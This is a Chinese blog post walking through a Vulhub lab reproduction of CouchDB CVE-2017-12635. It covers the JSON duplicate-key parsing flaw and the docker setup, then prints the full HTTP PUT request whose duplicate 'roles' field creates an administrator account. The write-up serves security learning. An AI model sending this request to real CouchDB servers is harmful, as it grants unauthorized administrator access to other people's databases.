利用Vulnhub复现漏洞 - Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

最新推荐文章于 2025-05-19 11:53:04 发布
原创 最新推荐文章于 2025-05-19 11:53:04 发布 · 1.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Vulnhub

探讨CVE-2017-12635漏洞原理,演示如何利用JSON解析差异,使普通用户升级为管理员,影响CouchDB版本小于1.7.0及2.1.1。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

Vulnhub官方复现教程

https://vulhub.org/#/environments/couchdb/CVE-2017-12635/

漏洞原理

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

影响版本:小于 1.7.0 以及 小于 2.1.1

参考链接:

复现漏洞

启动环境

https://blog.youkuaiyun.com/JiangBuLiu/article/details/93853056

进入路径为

cd /root/vulhub/couchdb/CVE-2017-12635

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

【注意】环境搭建运行需要很久……正常,不要放弃!!!✊✊✊
在这里插入图片描述
环境启动后,访问http://your-ip:5984/_utils/即可看到一个web页面,说明Couchdb已成功启动。
在这里插入图片描述

漏洞复现

【注意】设置Burp的拦截端口号为5984
发送如下数据包:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

返回403错误:{"error":"forbidden","reason":"Only _admin may set roles"},只有管理员才能设置Role角色:
在这里插入图片描述

发送一次包含两个roles字段的数据包,即可绕过限制:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

在这里插入图片描述
成功创建管理员,账户密码均为vulhub
再次访问http://your-ip:5984/_utils/,输入账户密码vulhub,可以成功登录:
在这里插入图片描述

Couchdb 垂直权限绕过漏洞CVE-2017-12635
一枚不知名的Java程序猿
10-02 1090
vulhub漏洞复现学习过程
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
weixin_45260839的博客
06-18 1104
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
12 - vulhub - Couchdb 垂直权限绕过漏洞CVE-2017-12635
易编橙 · 终身成长社群,相遇已是上上签!
10-21 541
Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。 在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞
你所不知道的权限绕过思路分享(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
喜欢Python编程的程序员柚柚呀
05-19 577
你所不知道的权限绕过思路分享。
vulfocus靶场couchdb 权限绕过CVE-2017-12635
没有故事
04-18 562
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。数据改包前测试:登陆IP:IP:63073/_utils,出现登陆页面,输入用户名和密码,显示错误。点击New 点击 HTTP。
Couchdb 垂直权限绕过漏洞CVE-2017-12635复现
玄道的网安博客
05-06 3333
简介 Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。 影响版本 版本<1.7.0以及 <2.1.1 环境搭建 https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635 编译及启动环境: ...
12 - vulhub - Couchdb 垂直权限绕过漏洞CVE-2024-12635(1)
2401_86638480的博客
09-03 770
Erlang:{a: “”}在定义一对键值对时,Eralang解析器将存储两个值;javascript只存储第二个值。但jiffy实现时,getter函数只返回第一个值。漏洞复现
CVE-2017-12635Couchdb垂直权限绕过漏洞
浅笑996的博客
11-28 1842
简介 Apache CouchDB是一个开源数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年年11月15日...
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
weixin_46239998的博客
01-01 977
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。影响版本:小于 1.7.0 以及 小于 2.1.1。密码:password。
couchdb 垂直权限绕过漏洞cve-2017-12635
whatday的专栏
06-08 857
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12635是由于Erlang和Ja
CouchDB垂直越权漏洞CVE-2017-12635
小小猪的博客
12-27 838
CouchDB垂直越权漏洞CVE-2017-12635) 框架介绍: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序) 环境搭建: 采用在线环境 地址 漏洞分析: 主要关注改包的过
权限绕过
A345545108的博客
04-26 290
这里主要判断请求头中是否包含了X-Requested-With并且值为XMLHttpRequest,如果有这个请求头则需要进行权限校验,回到preHandle,WebUtil.isAjaxRequest(request)返回false的话就可以不进入if判断,跳过权限校验了。先判断请求的路径是否为/则重定向到登录页面,然后从session中取出对应的值。
Couchdb垂直权限绕过(CVE-2017-12635)
m0_65150886的博客
01-15 546
它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。
漏洞复现----50、Couchdb 垂直权限绕过漏洞CVE-2017-12635
七天
07-08 1697
Couchdb 垂直权限绕过漏洞CVE-2017-12635
Kitura-CouchDB适配器实现:连接Kitura与CouchDB数据库
压缩包子文件的名称列表中的"Kitura-CouchDB-master"表明这是一个主版本的Kitura-CouchDB适配器项目源代码,通常包含源代码文件、文档、示例代码和构建脚本等。"master"分支通常代表开发人员可以从这个版本开始,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值